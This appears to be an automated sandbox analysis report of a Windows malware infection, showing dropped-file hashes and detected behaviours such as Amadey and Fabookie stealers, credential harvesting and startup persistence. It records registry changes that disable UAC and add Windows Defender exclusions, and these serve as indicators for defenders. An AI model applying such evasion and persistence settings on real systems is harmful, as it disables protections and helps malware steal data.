C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 32478da8fd25969571b2e93fba84ef5f
SHA1 7307d3d8b9b6ca34244a367daa23d572c483edc6
SHA256 ffabbb1d7dfde15c1a47fd80d25e858d2e9695134ce3a73bb43fec9862ea78c9
SHA512 a78886d74a49841ac02f83dc9e8f82c31393adbf3c163facafbc1238f6ff0ca0ba0c81ef8f6e576e6ba215af2b58905a1fb83e2a3954f21ad7b6556a20267d3f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/2836-766-0x0000000003760000-0x0000000003F52000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9e6d22d9fda8277fe48c53a7eb95570a
SHA1 830c396a64ccc1844f5dabcc421d16a284b9256b
SHA256 38dae8dae8bdc6197f2fd87435363371cc89e6fdd91b8428e3e48df4c07c7667
SHA512 3300c77dcfd22e12a7f5a8e64cb7d9986adb235108a438e51d47d9120da027fce0adaa2f5090152accb679656b22cda674a69f32b39530d7c1f36676a4995607

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 a060b33d6df657ee708fc71cb4580f39
SHA1 e19d5e7c9ec665a1fc0caaa84174ed15bd2c280d
SHA256 8c76d1785caafbd41c8aefd8a4e6f1a64c79e99da6dfaa83bf89ba6722f9647c
SHA512 e24b3f1c44026d777fe50d3e7fccafecc0225cd1ed6cdbf6752e82ff0772efd2da842c2b2b7cc0b2ebea90cea0158cb5e065cdbaf71024e29ad8f514637d0328

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fdaed8f502e92e4ce9b86b142c711437
SHA1 067cbda9309f36c996e5fbf8a71fca21af4f1baa
SHA256 ef0fbea894369ae0bab6bf648731533716882ea0017919fffe3a027e6939aef5
SHA512 2b6b375ca6f3cbeb982952ad3594e5bdde3f7782f791a487b87258cd2167a7ae7a434cfed5820cc20ec0111d12a6ed6d5e97ebcc90e71b79066e95b57686d5b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 01f5483dd961531c9b03479dfd7eb20f
SHA1 d756daaa4749b3dcc5752cff2b63ac6d411daa5b
SHA256 b46cd2da2df4cfcf0ad4140340597166610018c4fe53c1e638efaae325235086
SHA512 ac19f2e5c40b0947b884b5e635f21d37837c371e8a5cf47d7c071712cdc88e5830d5b36378edb18a3542ff89af8a047a7cba527238a87c27fe7e070b1b2eed28

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c50a8734c9b49f10f1e9e47838c8d866
SHA1 ac0b5155a5b09800bc9eee99ca9d92fb6e389c95
SHA256 4dd3510dd962449cf384b189372eaa4a1f8e720a1a417a1f982a585bbba9aac5
SHA512 8fbdd87b0a13aeeb5a3bf5989ae2d1673f0e655e309bcac03555d7efc71c037f0ed6182f4f5b5584824b8d94122e65246170db5f8fc203a6dc56ad6941c328af

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5136cb97354b28d3667b7d8a877a8eff
SHA1 97e48a9851620d854b46740f33d701fa35b5e179
SHA256 4593be45ed9f7a52511faeadb1d5ea4f0f671e85f90b3255fb99cad373098f61
SHA512 83551004beb42ed5e14246969d302ee0a0c7b70d4300b973ba32ba264896653996f126864699ad36bfc61ff4fbd4ace75a5c77e1bbb74cdec9eff7680406cc9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 08a871e15e56499b113d19a3f0cfd576
SHA1 3a40d368e005212340c80e2cb73837754c70a099
SHA256 1f52efad1bb28cd715a47b5bf6b0bc44cc3eb39fc33d670df0b328839475f9ff
SHA512 b7224eadbcce1f5f957ff4a37fffdbcff949d2a07bf7188f410b43adda69c0017af424e30330f544a80f6862f566154068ef3c16d6b497815ffe91613547fb74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b173db70deedee084b71613eaf896010
SHA1 3d4a36faf6059b4376a36c07629349dcc8b86b6e
SHA256 3a41dfba832c91cde4652e7b2b74713e91749286bfa05a0ae53dfc2d21c419bf
SHA512 543f5ca7946d91a4150e6893469ce4e3126ed0a30ae66d758fef396d71770cd0c2fe57797d0e21fb77be5957f88064d3734715c1ab9f9d4987dcd13cb4c3c1d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 616b61f92e83cbb219abc4e886f04722
SHA1 4f07fa56516294419b535460660a919e94552694
SHA256 8c0aea994dbf3f9546d1f484d0c3d642d706458b6c5f0b5072d2327bab1bf599
SHA512 649a089c7a6b8c00325fe6bdf51d85f3ea335e2d28f949cf53bd834f05c950f7290cb4a2f65b8b043cdaca0aae355397952dc98e718ea1c0eea29c071d5e4eaf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2555cecf96aa0099bb29bf177cf285c5
SHA1 5d02ff0fbe4b0968eb1c3da270d53b83e3202314
SHA256 27b65198ec02e702fea027c6fb154e240f88b0e7aa4458fe408bc411ffabe616
SHA512 1a3c284a220904334a1f7d61f1658c1b345625c376c4514cfeacdb1dbf0c662c9ace8422d3873f96b89574aaa4dcdb53ae2fb78c25feaa289f75f8baa89d66f2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5f5c04e57e50dd331a5640cf46a92126
SHA1 9bf0346b46a097ce8afbf1bc96d13c1bb94458ff
SHA256 fca6037c1136018d23839d104a7400239e95c1b8d259216b8bc8b6df51ff4d29
SHA512 380ad8693fc040821aa71c7ae5488d5ec50f924238c9dd10d2995b343897bb44e2b2bb0e2d89e41ac9f12ae144221d268a53cb721ec2a7e51826c76237800d99

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Kno63E1.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O3E62B0W\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-05 03:40

Reported

2023-10-05 03:46

Platform

win10-20230915-en

Max time kernel

89s

Max time network

307s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8uyealHzzpGxkNZBshQURQy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pP0mcv6Xs53QZ5WjBMnksL2b.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L6UP1Ru7w3PQ5rUvEgHAwfh4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3AVUwQy69w11wYuaPFHpqcJg.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KClTgTBpIPLuCUmmDaWqTwY.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NfRxw9VEj155Jga22TVujLzJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrB9EGWYMuTYg7agNBntg5Gc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IxJb32UDCOuwgMOD0SE8XJRL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M9DcS9PsxdVLrwPmZF28C8BJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1bAcsxjCQK2HDgBsEXDcsx2J.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dkoEkZasLDHT0gOqmVW5uFQX.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J04COPVV1zbADLibHvv63L37.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fVuNa7gdQo6H7rvYJCD4lQpU.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe N/A
N/A N/A C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe N/A
N/A N/A C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe N/A
N/A N/A C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
N/A N/A C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe N/A
N/A N/A C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
N/A N/A C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" C:\Windows\system32\backgroundTaskHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Haezhaequhija.exe\"" C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Media Player\Haezhaequhija.exe.config C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File created C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe.config C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-E9KOO.tmp C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-AU268.tmp C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-LM2RS.tmp C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\Windows Media Player\Haezhaequhija.exe C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-I0UF4.tmp C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-G0198.tmp C:\Windows\System32\Conhost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Windows\SYSTEM32\schtasks.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 C:\Windows\syswow64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Windows\SYSTEM32\schtasks.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SYSTEM32\schtasks.exe N/A
